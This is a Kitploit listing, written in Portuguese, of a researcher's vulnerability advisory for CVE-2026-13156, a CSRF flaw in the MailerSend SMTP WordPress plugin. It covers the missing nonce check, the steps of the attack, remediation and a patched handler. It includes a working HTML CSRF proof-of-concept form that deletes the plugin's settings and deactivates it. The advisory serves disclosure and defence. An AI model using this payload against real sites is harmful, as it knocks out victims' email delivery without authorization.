Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-13156 — CVE-2026-13156 Vulnerability Advisory & PoC — Discovered by Huynh Kien Minh (MinhHK). | Kitploit
Ferramentas/GitHubGitHub/minhhk68/cve-2026-13156
Phishing ToolsVulnerability AnalysisExploitationWeb SecurityPapers & ResearchLearning & Education
GitHubminhhk68/cve-2026-13156

CVE-2026-13156

CVE-2026-13156 Vulnerability Advisory & PoC — Discovered by Huynh Kien Minh (MinhHK).

Ver Repositório
há 19 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-13156 — Integração Oficial SMTP do MailerSend < 1.0.8 Exclusão de Configurações e Desativação do Plugin via CSRF

CVE-2026-13156 Researcher: Huynh Kien Minh Proton Hall of Fame WPScan Assigner

CVE-2026-13156 CSRF Attack Chain Infographic


📌 Resumo e Links Rápidos

[!IMPORTANT] Resumo: Foi descoberta uma vulnerabilidade de Cross-Site Request Forgery (CSRF) de Alta Gravidade (CVE-2026-13156) na integração oficial do plugin MailerSend SMTP para WordPress (< 1.0.8). O manipulador de eliminação de configuração mailersend_handle_configuration_delete() verifica as capacidades administrativas (manage_options) mas omite completamente a verificação de Nonce do WordPress (check_admin_referer()). Um atacante pode criar uma solicitação maliciosa de origem cruzada direcionada a um Administrador do WordPress autenticado para apagar silenciosamente as credenciais SMTP armazenadas e forçar a desativação do plugin, resultando em uma total Negação de Serviço da Aplicação em todos os fluxos de e-mail.

👉 Leia o artigo técnico completo no Medium: Artigo Técnico Detalhado: CVE-2026-13156 ou explore meu Portfólio de Segurança: https://minhhk.web.app/


📋 Resumo Executivo e Visão Geral da Vulnerabilidade

  • ID da Vulnerabilidade: CVE-2026-13156 (ID do Aviso WPScan: 595e653d-0904-43cf-8e61-d684599de11b)
  • Software Afetado: MailerSend – Integração Oficial SMTP (Plugin WordPress)
  • Versões Afetadas: Antes da versão 1.0.8 (< 1.0.8)
  • Tipo de Vulnerabilidade: Cross-Site Request Forgery (CSRF levando à Exclusão de Configurações e Desativação do Plugin) — CWE-352
  • Pesquisador Principal e Divulgador: Huynh Kien Minh (alias: MinhHK)
  • Função e Afiliação: Estudante de Segurança da Informação, Caçador de Bugs e Pesquisador de Segurança Ofensiva.

Sobre o Pesquisador:
Huynh Kien Minh (Huỳnh Kiến Minh) é um pesquisador proativo de cibersegurança e analista de vulnerabilidades conhecido por avaliações de segurança aprofundadas e divulgações responsáveis, incluindo análises técnicas do CVE-2026-13156. Ele também foi reconhecido oficialmente e homenageado no Proton Security Hall of Fame por encontrar e divulgar vulnerabilidades críticas de segurança.


🌐 Central de Verificação Oficial e Referências

Para verificar este aviso técnico, explorar análises de prova de conceito ou conectar-se com o pesquisador, visite:

  • 🏠 Central do Portfólio Oficial: Huynh Kien Minh Security Portfolio Hub
  • 💼 Perfil no LinkedIn: Conecte-se com Huynh Kien Minh no LinkedIn
  • 📝 Whitepaper Oficial no Medium: Artigo Técnico Detalhado: CVE-2026-13156 no Medium
  • 👨‍💻 Perfil no GitHub: MinhHK68 GitHub Profile
  • 🔗 Aviso WPScan: Entrada WPScan para CVE-2026-13156
  • 🔗 Relatório BaseFortify: Análise BaseFortify CVE-2026-13156

🔍 Análise Técnica Detalhada e Análise da Causa Raiz

1. Análise da Causa Raiz (Falta de Verificação de Nonce)

O plugin MailerSend – Integração Oficial SMTP para WordPress (antes da versão 1.0.8) registra uma ação administrativa (configuration-delete) destinada a limpar tokens de API armazenados, apagar opções de configuração SMTP (wp_options) e desativar o plugin quando acionado a partir do painel de administração.

Embora o endpoint verifique se o usuário ativo possui a capacidade manage_options (garantindo que a solicitação se origine de uma sessão de administrador), ele falha em realizar a verificação de nonce do WordPress (check_admin_referer() ou wp_verify_nonce()).

Como as solicitações HTTP sem validação de nonce não conseguem distinguir entre cliques intencionais do administrador e solicitações falsificadas de origem cruzada, qualquer site externo carregado por um administrador autenticado pode acionar silenciosamente a ação configuration-delete.

2. Ciclo de Vida do Ataque e Impacto

  1. Identificação do Alvo: Um atacante identifica um site WordPress alvo utilizando MailerSend SMTP (< 1.0.8).
  2. Entrega do Payload: O atacante cria uma página web maliciosa em HTML/JavaScript contendo um formulário de envio automático direcionado ao endpoint administrativo (/wp-admin/admin-post.php ou /wp-admin/admin.php?page=mailersend&action=configuration-delete).
  3. Acionamento: Um Administrador do WordPress autenticado visita a página web do atacante (por exemplo, via phishing, link de fórum ou XSS em um site externo).
  4. Execução e Negação de Serviço: O navegador envia a solicitação falsificada juntamente com os cookies de sessão ativos do administrador. O plugin MailerSend executa o manipulador de exclusão:
    • Todas as configurações SMTP do MailerSend e credenciais de API armazenadas são apagadas do banco de dados.
    • O plugin MailerSend é desativado automaticamente.
    • Impacto Crítico: O site alvo perde imediatamente todas as capacidades de envio de e-mail (redefinições de senha, notificações de pedidos, alertas de segurança falham sem aviso).

💻 Código de Exploit de Prova de Conceito (PoC)

[!WARNING] Aviso Ético: O seguinte payload de prova de conceito de Cross-Site Request Forgery (CSRF) em HTML é fornecido estritamente para fins educacionais, verificação defensiva e auditoria de segurança sob protocolos de divulgação ética por Huynh Kien Minh. Não execute contra alvos não autorizados.

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CVE-2026-13156 PoC — MailerSend SMTP Configuration Deletion via CSRF</title>
    <!-- Author: Huynh Kien Minh (https://minhhk.web.app/) -->
</head>
<body>
    <h2>CVE-2026-13156 — CSRF Verification PoC</h2>
    <p>If an authenticated WordPress Administrator visits this page, the MailerSend SMTP configuration will be deleted and the plugin deactivated.</p>
    
    <!-- Forged Request targeting the vulnerable MailerSend configuration deletion endpoint -->
    <form id="csrfPoC" action="http://target-wordpress-site.local/wp-admin/admin.php" method="GET">
        <input type="hidden" name="page" value="mailersend-smtp" />
        <input type="hidden" name="action" value="configuration-delete" />
        <!-- Notice: No valid _wpnonce token is required due to the vulnerability -->
        <input type="submit" value="Execute PoC (Simulate Attack)" />
    </form>

    <script>
        // Automatically submit the forged request when the administrator loads the page
        document.addEventListener("DOMContentLoaded", function() {
            console.log("[CVE-2026-13156] Executing CSRF Payload developed by Huynh Kien Minh...");
            // Uncomment line below to enable auto-execution in lab environments:
            // document.getElementById('csrfPoC').submit();
        });
    </script>
</body>
</html>

🛡️ Remediação e Análise do Patch

Para Administradores de Sistemas e Proprietários de Sites

  • Atualização Imediata: Atualize o plugin MailerSend – Integração Oficial SMTP imediatamente para a versão 1.0.8 ou superior.
  • Higiene de Sessão: Sempre saia das contas administrativas do WordPress ao navegar em páginas web externas não confiáveis, ou utilize perfis de navegador isolados separados (ou contêineres) para administração do site.

Para Desenvolvedores (Como o Patch Funciona)

Para garantir adequadamente ações administrativas de alteração de estado em plugins WordPress, os desenvolvedores devem impor validação rigorosa de nonce antes de processar solicitações:

root@kitploit:~
// Secure Implementation (Version 1.0.8+)
function mailersend_delete_configuration_handler() {
    // 1. Check User Capability
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( __( 'Unauthorized access.', 'mailersend' ), 403 );
    }

    // 2. REQUIRED: Verify CSRF Nonce Token
    if ( ! isset( $_GET['_wpnonce'] ) || ! wp_verify_nonce( $_GET['_wpnonce'], 'mailersend_delete_config_nonce' ) ) {
        wp_die( __( 'Security check failed (CSRF attempt blocked).', 'mailersend' ), 403 );
    }

    // 3. Proceed safely with configuration deletion
    delete_option( 'mailersend_smtp_settings' );
    deactivate_plugins( plugin_basename( __FILE__ ) );
    
    wp_redirect( admin_url( 'plugins.php?deactivated=true' ) );
    exit;
}

🏆 Reconhecimento de Segurança Relacionado

  • 🏆 Reconhecimento Proton Hall of Fame: Homenageado por descobrir e relatar falhas críticas na infraestrutura da Proton.
  • 🏠 Central do Portfólio Oficial: Explore mais pesquisas de segurança ofensiva, ferramentas de segurança de código aberto e publicações de Huynh Kien Minh.

⚖️ Licença e Direitos Autorais

Este repositório e aviso técnico são mantidos e publicados por Huynh Kien Minh (MinhHK) sob as diretrizes de divulgação responsável para promover um ecossistema global de WordPress e cibersegurança mais seguro.

Baixar ferramenta